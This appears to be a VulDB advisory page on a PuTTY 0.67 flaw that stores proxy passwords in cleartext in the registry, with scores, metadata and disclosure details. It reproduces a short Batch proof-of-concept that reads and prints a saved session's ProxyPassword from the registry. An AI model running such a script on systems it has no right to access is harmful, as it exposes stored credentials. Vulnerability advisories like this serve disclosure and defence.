| CVSS Meta Temp Score | Current Exploit Price (≈) | CTI Interest Score |
|---|---|---|
| 3.0 | $0-$5k | 0.00 |
Summary
A vulnerability was found in PuTTY 0.67. It has been rated as problematic. The affected element is an unknown function of the component Proxy Password Handler. The manipulation leads to cleartext storage. Moreover, an exploit is present.
Details
A vulnerability, which was classified as problematic, has been found in PuTTY 0.67 (Connectivity Software). This issue affects an unknown function of the component Proxy Password Handler. The manipulation with an unknown input leads to a cleartext storage vulnerability. Using CWE to declare the problem leads to CWE-312. The product stores sensitive information in cleartext within a resource that might be accessible to another control sphere. Impacted is confidentiality.
The weakness was disclosed 11/20/2016 by John Page (hyp3rlinx) as Putty Cleartext Password Storage as not defined mailinglist post (Bugtraq). The advisory is shared at seclists.org. An attack has to be approached locally. The successful exploitation requires a simple authentication. Technical details are unknown but a public exploit is available. MITRE ATT&CK project uses the attack technique T1555 for this issue.
A public exploit has been developed by John Page in Batch and been published immediately after the advisory. The exploit is available at seclists.org. It is declared as proof-of-concept. The code used by the exploit is:
@echo off
setlocal ENABLEEXTENSIONS
set /p v1=Enter Putty Saved Session: %1
echo Search registry for %v1% session Putty password?
pause
set KEY_NAME=HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\%v1%
set VALUE_NAME=ProxyPassword
FOR /F "tokens=1-3" %%A IN ('REG QUERY %KEY_NAME% /v %VALUE_NAME% 2^>nul') DO (
set ValueName=%%A
set ValueType=%%B
set ValueValue=%%C
)
if defined ValueName (
@echo Value Name = %ValueName%
@echo Value Type = %ValueType%
@echo Value Password = %ValueValue%
) else (
@echo %KEY_NAME%\%VALUE_NAME% not found.
)
set "v1="There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Product
Type
Name
Version
License
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vector: 🔍VulDB Reliability: 🔍
CVSSv3
VulDB Meta Base Score: 3.3VulDB Meta Temp Score: 3.0
VulDB Base Score: 3.3
VulDB Temp Score: 3.0
VulDB Vector: 🔍
VulDB Reliability: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vector | Complexity | Authentication | Confidentiality | Integrity | Availability |
|---|---|---|---|---|---|
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Reliability: 🔍
Exploiting
Class: Cleartext storageCWE: CWE-312 / CWE-310
CAPEC: 🔍
ATT&CK: 🔍
Physical: Partially
Local: Yes
Remote: No
Availability: 🔍
Access: Public
Status: Proof-of-Concept
Author: John Page
Programming Language: 🔍
Download: 🔍
Price Prediction: 🔍
Current Price Estimation: 🔍
| 0-Day | Unlock | Unlock | Unlock | Unlock |
|---|---|---|---|---|
| Today | Unlock | Unlock | Unlock | Unlock |
Threat Intelligence
Interest: 🔍Active Actors: 🔍
Active APT Groups: 🔍
Countermeasures
Recommended: no mitigation knownStatus: 🔍
0-Day Time: 🔍
Exploit Delay Time: 🔍
Timeline
11/20/2016 🔍11/20/2016 🔍
11/21/2016 🔍
06/07/2019 🔍
Sources
Advisory: Putty Cleartext Password StorageResearcher: John Page (hyp3rlinx)
Status: Not defined
GCVE (VulDB): GCVE-100-93737
scip Labs: https://www.scip.ch/en/?labs.20161013
Entry
Created: 11/21/2016 14:47Updated: 06/07/2019 15:58
Changes: 11/21/2016 14:47 (46), 06/07/2019 15:58 (2)
Complete: 🔍
Cache ID: 216::103
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
No comments yet. Languages: en.
Please log in to comment.